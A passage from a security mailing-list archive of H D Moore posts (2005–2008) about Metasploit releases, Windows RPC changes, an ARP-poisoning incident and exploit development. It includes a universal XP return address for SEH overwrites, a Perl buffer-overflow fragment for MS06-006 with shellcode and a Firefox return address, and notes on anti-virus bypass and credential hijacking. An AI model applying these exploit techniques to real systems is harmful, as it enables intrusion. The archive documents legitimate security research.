 challenges are a waste of a time in terms of product security, its just
 blatent exploitation (the bad kind).

-HD

On Thursday 07 April 2005 17:35, Marc Maiffret wrote:
> The "funny" part is if the server gets DDoS'd then so will Windows IT
> Pro magazine whom is hosting the hack server (now at least) on the same
> subnet as their main website and with the same routes of course...
> Maybe they can product test some Arbor networks gear while they are at
> it :-) two for one.
>
> Then again we did break our last xbox, so h
>
> Signed,
> Marc Maiffret
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Metasploit Framework v2.4

2005-05-11 Thread H D Moore 
The Metasploit Framework is an advanced open-source exploit
development platform. The 2.4 release includes three user interfaces,
72 exploits and 75 payloads.

The Framework will run on any modern operating system that has a working
Perl interpreter. The Windows installer includes a slimmed-down version
of the Cygwin environment.

Some highlights in this release:

 - Previously unreleased exploits (20 others added since 2.3)
+ Solaris KCMS Arbitary File Read
+ Solaris snmpXdmid AddComponent Overflow
+ Metasploit Framework Payload Handler
+ Microsoft Message Queueing Service MSO5-017
+ Minishare 1.41 Buffer Overflow

 - Addition of the new SunRPC and XDR Perl API
+ Allows for clean RPC exploit development
+ Used by two new exploit modules (KCMS and snmpXdmid)
+ Updated sadmind exploit uses the new API

 - Includes the new win32 PassiveX payload system
+ Loads an arbitary ActiveX through Internet Explorer
+ PassiveX payload loads the next stage over HTTP
+ HTTP transport emulates a standard TCP connection
+ Interact with cmd.exe, VNC, or Meterpreter over HTTP
+ Uses Internet Explorer settings for proxy access
+ Fully-functional on systems with Internet Explorer 6
+ Extensive documentation is available online:
* http://www.uninformed.org/?v=1&a=3&t=pdf
 
 - Stability improvements and numerous bugs fixes
+ The msfweb interface is slightly less of a memory pig
+ Many exploits have been updated and improved
+ New external references added to the exploit modules

 - General improvements to the payload system
+ Brand new "shelldemo" binary for the impurity stager
+ Size reductions to win32_bind, win32_reverse, and others
+ Can now make standalone executables with msfpayload
+ Interact with metasploit payloads via payload_handler.pm
  
This release is available from the Metasploit.com web site:
  - Unix:  http://metasploit.com/tools/framework-2.4.tar.gz
  - Win32: http://metasploit.com/tools/framework-2.4.exe
  
A demonstration of the msfweb interface is running live from:
  - http://metasploit.com:5/

Exploit modules designed for the 2.2 and 2.3 releases should maintain
compatibility with 2.4. If you run into any problems using older
modules with this release, please let us know.

The Opcode Database now includes Service Pack 1 for Windows 2003
Server, increasing the record count to over 10 million. We would like to
thank Catalin Patulea  for helping us optimize and
improve the database -- queries are now drastically faster.

The Framework development team consists of four active members and a
handful of part-time contributors. Check out the 'Credits' exploit
module for a complete list of contributors.

You can subscribe to the Metasploit Framework mailing list by sending a
blank email to framework-subscribe[at]metasploit.com. This is the
preferred way to submit bugs, suggest new features, and discuss the
Framework with other users.

If you would like to contact us directly, please email us at:
msfdev[at]metasploit.com.

For more information about the Framework and this release in general,
please refer to the online documentation, particularly the User Guide:
  - http://metasploit.com/projects/Framework/documentation.html


Enjoy!

- The Metasploit Framework Development Team
 ( hdm, spoonm, skape, and vlad902 )
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re : CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit

2008-07-25 Thread H D Moore 
On Friday 25 July 2008, tixxDZ wrote:
> I do not want to offend anyone (Metasploit people), this is a simple
> joke: can you share with us all the logs of the vulnerable servers ?
> ;) , the exploit will use the Metasploit service to verify
> exploitability. ex checking my Opendns:

The exploit needs a service to determine the source port used by the 
target name server. The 'check' command will do this and could probably 
use a better warning about information disclosure. The exploit itself 
will also query the Metasploit service if you set SRCPORT to 0. While 
this means we *could* capture a list of vulnerable nameservers which 
query this service, honestly we don't care and aren't logging it. There 
are much more effective ways to scan for exploitable cache servers :-)

The source code for the helper service is also a Metasploit module and can 
be found under modules/auxiliary/server/dns/spoofhelper.rb

If you want to use your own server for this, just change 
*.red.metasploit.com to be a domain handled by your own copy of the 
spoofhelper module. In the future, we will add an option to specify a the 
nameserver used for this check.

To clarify:

 - Nothing is sent to metasploit.com unless SRCPORT is manually set to '0' 
or the check command is run (non-standard for aux modules).

 - The only information we receive is the IP and source port of the tested 
nameserver. No information is sent about the user's system or their own 
IP address.

 - Even though this information could be logged and sorted and whatnot, we 
honestly don't care and just added it as a convenience feature. We dont 
keep records of the queries hitting the server and have no plans to start 
doing so.

 - If you don't like it, don't run 'check' and don't set SRCPORT to '0' 
for automatic mode. It won't hurt our feelings and you are free to modify 
the module to point at your own helper service.

Cheers,

-HD


PS. You can use the service outside of the module to check various 
servers. For example:

while true; do dig +short -t TXT `date +%s`.red.metasploit.com @4.2.2.3; 
sleep 1; done
"209.244.4.227:33165 1217014609.red.metasploit.com"
"209.244.4.227:32728 1217014610.red.metasploit.com"
"209.244.4.227:29607 1217014611.red.metasploit.com"
"209.244.4.227:28032 1217014612.red.metasploit.com"
"209.244.4.227:25992 1217014613.red.metasploit.com"
"209.244.4.227:31301 1217014614.red.metasploit.com"
"209.244.4.227:22884 1217014615.red.metasploit.com"
"209.244.4.227:33722 1217014616.red.metasploit.com"

^- changing ports means the box is patched.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Metasploit 3.2 Offers More 'Evil Deeds'

2008-10-09 Thread H D Moore 
You can find our SecTOR presentation online at:
  http://metasploit.com/research/conferences/

Grab an early of 3.2 (testing) from SVN:
  $ svn co http://metasploit.com/svn/framework3/trunk/ msf32/

A little bit about the new licensing (much more to follow):
  http://www.darkreading.com/document.asp?doc_id=165636&WT.svl=news1_1

Metasploit is now officially an open-source project with a mostly-new 
group of developers behind it. We are still a week or two away from the 
final release, so keep an eye out for more information about the new 
features and improvements on the metasploit blog:
  http://metasploit.com/blog

-HD

PS. The "Evil Deeds" article is mostly correct, but some of the specific 
items were mangled in translation. The new EXE template does not allow 
you to turn a metasploit exploit into an EXE, it lets you take a 
metasploit payload+encoder into an EXE, big difference :-)

On Thursday 09 October 2008, Ivan . wrote:
> Metasploit 3.2 looks like it rocks!


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Metasploit Framework 3.2 Released

2008-11-19 Thread H D Moore 
 888   888d8b888
 888   888Y8P888
 888   888   888
8b.d88b.  .d88b. 88 b. .db 8b. 888 .d88b. 8
888 "888 "88bd8P  Y8b888   "88b88K 888 "88b888d88""88b88
888  888  88   .d88"Yb.888  8  8
888  888  888Y8b.Y88b. 888  888 X8 d88P888Y88..88P888Y88b.
888  888  888 "Y  "Y888"Y88 8P'8P" 888 "Y88P" 888 "Y888
   888
           888
   888


 Contact: H D Moore  FOR IMMEDIATE RELEASE
   Email: hdm[at]metasploit.com

 
  Austin, Texas, November 19th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.2 of
their exploit development and attack framework. The latest version
is provided under a true open source software license (BSD) and is 
backed by a community-based development team.

  Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the iPhone. Users can access Metasploit using the tab-completing console
interface, the Gtk GUI, the command line scripting interface, or the 
AJAX-enabled web interface. The Windows version of Metasploit includes
all software dependencies and a selection of useful networking tools. 

  The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at


 - http://metasploit.com/framework/


  This release includes a significant number of new features and
capabilities, many of which are highlighted below.

  Version 3.2 includes exploit modules for recent Microsoft flaws, such 
as MS08-041, MS08-053, MS08-059, MS08-067, MS08-068, and many more. 

  The module format has been changed in version 3.2. The new format
removes the previous naming and location restrictions and paved the way
to an improved module loading and caching backend. For users, this means
being able to copy a module into nearly any subdirectory and be able to
immediately use it without edits.

  The Byakugan WinDBG extension developed by Pusscat has been integrated
with this release, enabling exploit developers to quickly exploit new
vulnerabilities using the best Win32 debugger available today.

  The Context-Map payload encoding system development by I)ruid is now
enabled in this release, allowing for any chunk of known process memory to
be used as an encoding key for Windows payloads.

  The Incognito token manipulation toolkit, written by Luke Jennings, has
been integrated as a Meterpreter module. This allows an attacker to gain
new privleges through token hopping. The most common use is to hijack
domain admin credentials once remote system access is obtained.

  The PcapRub, Scruby, and Packetfu libraries have all been linked into
the Metasploit source tree, allowing easy packet injection and capture.

  The METASM pure-Ruby assembler, written by Yoann Guillot and Julien 
Tinnes, has gone through a series of updates. The latest version has been
integrated with Metasploit and now supports MIPS assembly and the ability
to compile C code.

  The Windows payload stagers have been updated to support targets with
NX CPU support. These stagers now allocate a read/write/exec segment of
memory for all payload downloads and execution. 

  Executables which have been generated by msfpayload or msfencode now 
support NX CPUs. The generated executable is now smaller and more 
reliable, opening the door to a wider range of uses. The psexec and
smb_relay modules now use an executable template thats acts like a real
Windows service, improving the reliability and cleanup requirements of
these modules.

  The Reflective DLL Injection technique pioneered by Stephen Fewer of
Harmony Security has been integrated into the framework. The new payloads
use the "reflectivedllinjection" stager prefix and share the same binaries
as the older DLL injection method.

  Client-side browser exploits now benefit from a set of new javascript
obfuscation techniques developed by Egypt. This improvement leads to a
greater degree of anti-virus bypass for client-side exploits.

  Metasploit contains dozens of exploit modules for web browsers and 
third-party plugins. The new browser_autopwn module ties many of these 
together with advanced fingerprinting techniques to deliver more shells
than most pen-testers know what to do with.

  This release includes a set of man-in-the-middle, authentication relay,
and authentication capture modules. These modules can be integrated

[Full-disclosure] Analysis of MS08-006 / Demo of MS08-007

2008-02-14 Thread H D Moore 
Available online at:
 https://strikecenter.bpointsys.com/

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] When standards attack...

2008-03-20 Thread H D Moore 
The WebKit folks just added client-side SQL database support:
 
http://webkit.org/blog/126/webkit-does-html5-client-side-database-storage/
http://glazkov.com/blog/html5-gears-wrapper/

In addition to all of the existing attacks through a web browser, we can 
now take into account SQLite vulnerabilities and client-side SQL 
injection issues as well.

>From the security section of the specification:
http://www.whatwg.org/specs/web-apps/current-work/multipage/section-sql.html#sql

"""
[ 4.11.8.1. User agents ]

User agent implementors are strongly encouraged to audit all their 
supported SQL statements for security implications. For example, LOAD 
DATA INFILE is likely to pose security risks and there is little reason 
to support it.

In general, it is recommended that user agents not support features that 
control how databases are stored on disk. For example, there is little 
reason to allow Web authors to control the character encoding used in the 
disk representation of the data, as all data in ECMAScript is implicitly 
UTF-16.

[ 4.11.8.2. SQL injection ]
Authors are strongly recommended to make use of the ? placeholder feature 
of the executeSql() method, and to never construct SQL statements on the 
fly. 
"""

...because letting developers choose to bind their query parameters has 
worked so well before ;-)

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Deiban OpenSSL Fun

2008-05-14 Thread H D Moore 
http://metasploit.com/users/hdm/tools/debian-openssl/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Metasploit - Hack ?

2008-06-02 Thread H D Moore 
Problem solved. Someone is ARP poisoning the IP address of the router on which 
the www.metasploit.com server resides. 
I hardcoded an ARP entry for the real router and that seems to solve the MITM 
issue. It doesn't help the other 250 servers 
on that network, but thats an issue for the ISP to resolve. I included a 
traffic sample of the ARP poisoning below, if anyone
is interested:

13:04:38.967562 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:05:dc:0c:84:00
13:04:39.768055 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:40.397616 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:05:dc:0c:84:00
13:04:40.397686 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:40.397751 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:40.397819 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:40.397886 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:41.127384 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:41.127446 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:41.447854 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:41.447914 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:41.826560 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:42.768019 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:43.397341 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:05:dc:0c:84:00
13:04:43.397410 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:43.397476 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:43.397548 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:44.182397 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:44.182464 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:44.447680 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:44.447749 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:44.826588 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:45.768273 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:05:dc:0c:84:00
13:04:46.396933 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:46.397001 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:46.397066 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:47.174445 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:05:dc:0c:84:00
13:04:47.174514 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a
13:04:47.448530 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), 
length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a



> On Monday 02 June 2008, Jacques Erasmus wrote:
> > Seems like the metasploit site has been hacked.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Metasploit - Hack ?

2008-06-02 Thread H D Moore 
Looks like someone is doing ARP poisoning at the ISP level. The actual 
metasploit.com server(s) are untouched, but someone is still managing to 
MITM a large portion of the incoming traffic. To make things even more 
fun, its cooinciding with a DoS attack (syn floods) on most of the open 
services.

If you are worried about the the Metasploit Framework source code being 
MITM'd during SVN checkouts, use the SSL version of the SVN tree:

$ svn co https://metasploit.com/svn/framework3/trunk/

-HD


On Monday 02 June 2008, Jacques Erasmus wrote:
> Seems like the metasploit site has been hacked.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows XP SP3 - DCERPC Changes

2007-12-19 Thread H D Moore 
Changes between DCERPC services on XP SP2 and XP SP3 (release candidate)
This is from a quick and dirty unmidl.py + diff(3) session[1]
Results do not include new services bundled with SP3.
Results are likely incomplete.
Verify this with mIDA.
Happy holidays.
Thanks Dave
For UNMIDL
Cheers,

-HD

--

dhcpcsvc.dll - DHCP Client RPC Service
[ uuid(3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5), version(1.0) ]

New operations added:

long  Function_0c( 
[in] [unique]  [string] wchar_t * element_67,
[in]  long  element_68,
[in]  [string] wchar_t *  element_69,
[in] [unique]  TYPE_1 ** element_70,
[in] [unique]  TYPE_6 ** element_71,
[out]  long * element_80
 );

long  Function_0d( 
[in] [unique]  [string] wchar_t * element_82,
[in]  [string] wchar_t *  element_83,
[in] [unique]  TYPE_1 ** element_84,
[in,out]  TYPE_6 * element_85
 );

long  Function_0e( 
[in] [unique]  [string] wchar_t * element_87,
[in]  long  element_88,
[out] [ref] [unique]  [string] wchar_t ** element_89
 );

long  Function_0f( 
[in] [unique]  [string] wchar_t * element_91,
[in]  long  element_92,
[in]  [string] wchar_t *  element_93
 );

long  Function_10( 
[in] [unique]  [string] wchar_t * element_95,
[in]  [string] wchar_t *  element_96,
[out]  TYPE_8 * element_97
 );

long  Function_11( 
[in] [unique]  [string] wchar_t * element_107,
[size_is(*element_110)] [out] [ref] [unique]  long ** 
element_109,
[out]  long * element_110
 );


lsasrv.dll - LSARPC
[ uuid(12345778-1234-abcd-ef00-0123456789ab), version(0.0) ]

New operations added:

long  Function_4f( 
[in]  long  element_1115,
[in] [unique]  [string] wchar_t * element_1116,
[out] [context_handle]  void * element_1117
 );

long  Function_50( 
[in]  long  element_1119,
[in,out] [context_handle]  void * element_1120
 );

long  Function_51( 
[in]  long  element_1122,
[in] [context_handle]  void * element_1123,
[in]  long  element_1124,
[in]  TYPE_78 * element_1125,
[in]  TYPE_70 * element_1126
 );


msdtcprx.dll - MS Distributed Transaction Controller RPC Service
[ uuid(906b0ce0-c70b-1067-b317-00dd010662da), version(1.0) ]

Completely removed from XP SP3


p2psvc.dll - Peer Networking Identity Manager
[ uuid(a2d47257-12f7-4beb-8981-0ebfa935c407), version(1.0) ]

Changes to structure definitions used by operations 5, 6, 7, and 8
Changes to the function definitions for operations 5 and 7


scesrv.dll - Security Configuration Editor Engine
[ uuid(93149ca2-973b-11d1-8c39-00c04fb984f9), version(0.0) ]

Completely removed from XP SP3


seclogon.dll - Secondary Logon service
[ uuid(12b81e99-f207-4a4c-85d3-77b42f76fd14), version(1.0) ]

Completely removed from XP SP3


termsrv.dll - Terminal Server
[ uuid(5ca4a760-ebb1-11cf-8611-00a0245420ed), version(1.0) ]

A range check was added to the last argument of operation 0x24

char Function_24(
[in] [context_handle]  void * element_228,
[out]  long * element_229,
[size_is(element_232)] [out]  char  element_230,
[in]  [range(0,32768)] long  element_232
 );
 
In XP SP2, this operation is defined as:
 
char  Function_24( 
[in] [context_handle]  void * element_228,
[out]  long * element_229,
[size_is(element_231)] [out]  char  element_230,
[in]  long  element_231
 ); 
 
Since this is a size_is() field, we can assume this is an overflow check

This operation is known as RpcWinStationEnumerateProcesses()

Since it requires a context handle, its likely post-authentication.


wzcsvc - Wireless Configuration
[ uuid(621dff68-3c39-4c6c-aae3-e68e2c6503ad), version(1.0) ]

New operation added:

long  Function_15(
[in] [context_handle]  void * element_207,
[in]  TYPE_13 * element_208,
[in,out] [ref] [unique]  TYPE_13 *** element_209
 ); 


1.Used 'cabextract' to extract files from the SP2 and SP3 installers. Ran 
unmidl.py on each file from SP2, normalized element and type names, then 
compared it with the output from each file in SP3. The SP2 file set was 
probably missing some files, so there will be gaps in this data. 

___

[Full-disclosure] Windows XP SP2 - SP3 Compatible Return Addresses

2007-12-19 Thread H D Moore 

Use 0x71aa15cf for pop/pop/ret on WinXP SP2/SP3 English


Download the mini-database here:
http://metasploit.com/users/hdm/tools/opcodes_xp_sp2_sp3.tar.gz

>From the README:

This package contains a text listing of addresses which can be useful for
exploitation. Each subdirectory represents a type of return address and
each file within the subdirectory refers to a specific DLL.

These addresses should be valid on any Windows XP SP2 or Windows XP SP3
(release candidate) system using the English language.


To locate a return address, first determine which type of opcode you need.
If you are exploiting a SEH overwrite, then the "poppopret" files may be
the easiest route to reliable code execution. Once you know the type of
opcode you want, determine what DLLs are used by the target program. At
this point, you can just view the appropriate text file to obtain a list
of usable addresses. Examples below.


Exploiting a SEH overwrite in a program which uses Winsock2:

$ cat poppopret/ws2help.dll.txt
0x71aa1560 pop esi; pop ebp; retn 0x0008
0x71aa15cf pop edi; pop ebp; retn 0x0008

Using a "call eax" equivalent opcode in a program which uses OLE

$ cat eax/oleaut32.dll.txt
0x771613f2 call eax

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Metasploit Framework v3.1 Released

2008-01-27 Thread H D Moore 
METASPLOIT UNLEASHES VERSION 3.1 OF THE METASPLOIT FRAMEWORK
   New Version of Attack Framework Ready to Pwn

  Austin, Texas, January 28th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.1 of
their exploit development and attack framework. The latest version
features a graphical user interface, full support for the Windows
platform, and over 450 modules, including 265 remote exploits. 

  "Metasploit 3.1 consolidates a year of research and development,
integrating ideas and code from some of the sharpest and most innovative
folks in the security research community" said H D Moore, project
manager. Moore is referring the numerous research projects that have
lent code to the framework.

  These projects include the METASM pure-ruby assembler developed by
Yoann Guillot and Julien Tinnes, the "Hacking the iPhone" effort
outlined in the Metasploit Blog, the Windows kernel-land payload
staging system developed by Matt Miller, the heapLib browser
exploitation library written by Alexander Sotirov, the Lorcon 802.11
raw transmit library created by Joshua Wright and Mike Kershaw, Scruby,
the Ruby port of Philippe Biondi's Scapy project, developed by Sylvain
Sarmejeanne, and a contextual encoding system for Metasploit payloads.
"Contextual encoding breaks most forms of shellcode analysis by
encoding a payload with a target-specific key" said I)ruid, author of
the Uninformed Journal (volume 9) article and developer of the
contextual encoding system included with Metasploit 3.1.  

  The graphical user interface is a major step forward for Metasploit
users on the Windows platform. Development of this interface was driven
by Fabrice Mourron and provides a wizard-based exploitation system, a
graphical file and process browser for the Meterpreter payloads, and a
multi-tab console interface. "The Metasploit GUI puts Windows users on
the same footing as those running Unix by giving them access to a 
console interface to the framework" said H D Moore, who worked with
Fabrice on the GUI project. 

  The latest incarnation of the framework includes a bristling
arsenal of exploit modules that are sure to put a smile on the face of
every information warrior. Notable exploits in the 3.1 release include
a remote, unpatched kernel-land exploit for Novell Netware, written by
toto, a series of 802.11 fuzzing modules that can spray the local
airspace with malformed frames, taking out a wide swath of
wireless-enabled devices, and a battery of exploits targeted at
Borland's InterBase product line. "I found so many holes that I just
gave up releasing all of them", said Ramon de Carvalho, founder of RISE
Security, and Metasploit contributor. 

  "Metasploit continues to be an indispensable and reliable penetration
testing framework for our modern era", says C. Wilson, a security
engineer who uses Metasploit in his daily work. Metasploit is used by
network security professionals to perform penetration tests, system
administrators to verify patch installations, product vendors to
perform regression testing, and  security researchers world-wide. The
framework is written in the Ruby  programming language and includes
components written in C and assembler.

  Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the tiny Nokia n800 handheld. Users can access Metasploit using the
tab-completing console interface, the Gtk GUI, the command line scripting 
interface, or the AJAX-enabled web interface. The Windows version of
Metasploit includes all software dependencies and a selection of useful
networking tools. 

  The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at

http://metasploit3.com/

  # # #
   
If you'd like more information about this topic, or to schedule an
interview with the developers, please email msfdev[at]metasploit.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] All you WMF haxxors are belong to...... Mr Moore

2006-01-23 Thread H D Moore 
Nice DoS bug, next time try emailing us first :-)

-HD

On Monday 23 January 2006 04:23, cranium pain wrote:
> WMF Exploit vulnerable?
>
> [*] Starting Reverse Handler.
> [*] Waiting for connections to http://0.0.0.0:80/
> [*] Got connection from 0.0.0.0:443 <-> 1.1.1.1:42121
> [*] Sending Stage (2834 bytes)
> [*] Sleeping before sending dll.
> [*] Uploading dll to memory (69643), Please wait...
> [*] Upload completed
> meterpreter> Out of memory during "large" request for 2147487744 bytes,
> total sbrk() is 17950720 bytes at
> /home/framework/lib/Pex/Meterpreter/Packet.pm line 509
>
>
> 509:  $res -1 if ($res >= 0 and not defined(recv($fd, $tempBuffer,
> $tempBufferLength, 0)));
>
> --
>
> "haxxoring haxxors for fun and fun"
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] All you WMF haxxors are belong to...... Mr Moore

2006-01-23 Thread H D Moore 
There are a handful of cases where a malicious server / mitm could cause 
the Framework to run out of memory. We aren' t that concerned with it -- 
if you can find a way to do something useful (run code, etc), let us 
know. We might look at limiting this in version 3.0, but no matter what 
'max size' we place on a protocol response, its never going to be small 
enough to account for the low-end system or big enough to handle truly 
gigantic (legit) replies. The SMB, DCERPC, and BackupExec protocols also 
suffer from 'arbitrary malloc and die' issues. 

-HD


On Monday 23 January 2006 08:40, H D Moore wrote:
> Nice DoS bug, next time try emailing us first :-)
>
> -HD
>
> On Monday 23 January 2006 04:23, cranium pain wrote:
> > WMF Exploit vulnerable?
> >
> > [*] Starting Reverse Handler.
> > [*] Waiting for connections to http://0.0.0.0:80/
> > [*] Got connection from 0.0.0.0:443 <-> 1.1.1.1:42121
> > [*] Sending Stage (2834 bytes)
> > [*] Sleeping before sending dll.
> > [*] Uploading dll to memory (69643), Please wait...
> > [*] Upload completed
> > meterpreter> Out of memory during "large" request for 2147487744
> > bytes, total sbrk() is 17950720 bytes at
> > /home/framework/lib/Pex/Meterpreter/Packet.pm line 509
> >
> >
> > 509:  $res -1 if ($res >= 0 and not defined(recv($fd, $tempBuffer,
> > $tempBufferLength, 0)));
> >
> > --
> >
> > "haxxoring haxxors for fun and fun"
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MS06-06 Windows Media Player Exploitation

2006-02-16 Thread H D Moore 
Still getting some annoying crashes (SEH trick in alphanum code is 
annoying when you are trying to debug something...), but the basic 
solution is:

1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted bytes

my $pattern   = Pex::Text::PatternCreate(16384);
substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2090, length($shellcode), $shellcode);
$content   = "";

Return address is from js3250.dlll in Firefox 1.5.0.1, you should 
auto-target based on the browser version.

-HD

On Thursday 16 February 2006 16:26, c0ntex wrote:
> No exploit, just some basic research - anyone with 100% Ascii win32
> shellcode?
>
> http://open-security.org/winmedia/index.html
>
> --
>
> regards
> c0ntex
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
